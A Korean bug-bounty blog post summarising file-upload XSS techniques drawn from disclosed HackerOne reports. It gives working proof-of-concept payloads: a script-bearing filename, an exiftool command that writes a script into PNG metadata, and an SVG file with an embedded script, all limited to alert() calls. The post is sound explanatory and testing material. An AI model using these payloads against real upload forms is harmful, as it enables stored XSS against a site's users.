$ whoami
Home
  • 분류 전체보기 (116)
    • Exploit (9)
      • Tools (2)
      • Exploit (5)
      • Bug Bounty (2)
    • Wargame (82)
      • HackCTF (15)
      • XSS game (6)
      • Dreamhack (2)
      • Webhacking.kr (7)
      • XSS Challenges (8)
      • H4CKING GAME (3)
      • 정보보호영재교육원 (1)
      • Lord of SQL Injection (40)
    • CTF (25)
      • YISF 2022 (2)
      • CBHC 2022 (1)
      • HeroCTF v4 (2)
      • corCTF 2022 (2)
      • Aero CTF 2022 (0)
      • BDSec CTF 2022 (4)
      • San Diego CTF 2022 (5)
      • WACon 2022 Qualifier (1)
      • Cyber Conflict Exercise 202.. (4)
      • DiceCTF 2023 (1)
      • Incognito 4.0 (3)
Home
  • 분류 전체보기 (116)
    • Exploit (9)
      • Tools (2)
      • Exploit (5)
      • Bug Bounty (2)
    • Wargame (82)
      • HackCTF (15)
      • XSS game (6)
      • Dreamhack (2)
      • Webhacking.kr (7)
      • XSS Challenges (8)
      • H4CKING GAME (3)
      • 정보보호영재교육원 (1)
      • Lord of SQL Injection (40)
    • CTF (25)
      • YISF 2022 (2)
      • CBHC 2022 (1)
      • HeroCTF v4 (2)
      • corCTF 2022 (2)
      • Aero CTF 2022 (0)
      • BDSec CTF 2022 (4)
      • San Diego CTF 2022 (5)
      • WACon 2022 Qualifier (1)
      • Cyber Conflict Exercise 202.. (4)
      • DiceCTF 2023 (1)
      • Incognito 4.0 (3)
블로그 내 검색
CONTACT

HACKINTOANETWORK

WEB APPLICATION BUG HUNTER, PENETRATION TESTER

  • Exploit/Exploit

    [XSS] File upload XSS

    2023. 2. 2.

    by. hackintoanetwork

    XSS via filename


     

    Node.js third-party modules disclosed on HackerOne: [tianma-static]...

     

    hackerone.com

    1. create filename <img src=x onerror=alert(1)>
    2. start tianma-static
    3. xss fired

     

     

    XSS via Metadata


     

    Shopify disclosed on HackerOne: XSS Stored via Upload avatar PNG...

     

    hackerone.com

    Exiftool를 사용하여 메타데이터에 xss 페이로드 쓰기

    파일에서 exif 메타데이터가 제거되지 않은 경우에 발생할 수 있다.

     

    exiftool command

    exiftool -Comment="\"><script>alert(prompt('XSS'))</script>" xss_comment_exif_metadata_double_quote.png

    Payload 

    �PNG
    �
    IHDRdp�TtEXtSoftwareAdobe ImageReadyq�e<9tEXtComment"><script>alert(prompt('XSS BY ZEROX4'))</script>
                                                                                                        /-{IDATx���E��K��s�9xd$#���J� %IR$�(���s�9Ñ������evnv���>����q�;;;S�U������\.����=��=�ܿ��BCb����QHyԑEYՑ�s$s�T�:�x���8���إ�}2`���0P����@�(��j�(����D�J�d�%[�

     

     

    XSS via SVG


     

    Paragon Initiative Enterprises disclosed on HackerOne: Stored XSS...

     

    hackerone.com

     

    Stored XSS using SVG file

    Hey guys, hope you all are doing well. I am Bharat Singh a Security Researcher and bug hunter from India. In this writeup I am going to…

    infosecwriteups.com

    웹 애플리케이션이 이미지 유형이기도 한 SVG(Scalable Vector Graphics) 파일 확장자 업로드를 허용하는 경우. xss 취약점이 발생할 수도 있다.

     

    Payload

    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
      <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
      <script type="text/javascript">
        alert("XSS via SVG");
      </script>
    </svg>

     

     

     

    저작자표시 비영리
    • 카카오스토리
    • 트위터
    • 페이스북

    'Exploit > Exploit' 카테고리의 다른 글

    How to install Parallels tools on Kali Linux kernel 5.18.0  (0) 2022.09.27
    [Follina] Microsoft Office code execution vulnerability  (0) 2022.06.04
    [EternalBlue] Windows SMBv1 Vulnerability  (0) 2022.02.15
    [Log4Shell] Log4j 2 Vulnerability  (0) 2022.02.14
    bugbounty, File Upload, meta, SVG, xss

    댓글 0

    관련글

    • How to install Parallels tools on Kali Linux kernel 5.18.0 2022.09.27
    • [Follina] Microsoft Office code execution vulnerability 2022.06.04
    • [EternalBlue] Windows SMBv1 Vulnerability 2022.02.15
    • [Log4Shell] Log4j 2 Vulnerability 2022.02.14
    맨 위로
전체 글 보기
Tistory 로그인
Tistory 로그아웃
로그아웃 글쓰기 관리

Today 0

Total 13,024

Powered by hackintoanetwork

Designed by Nana
블로그 이미지
hackintoanetwork

티스토리툴바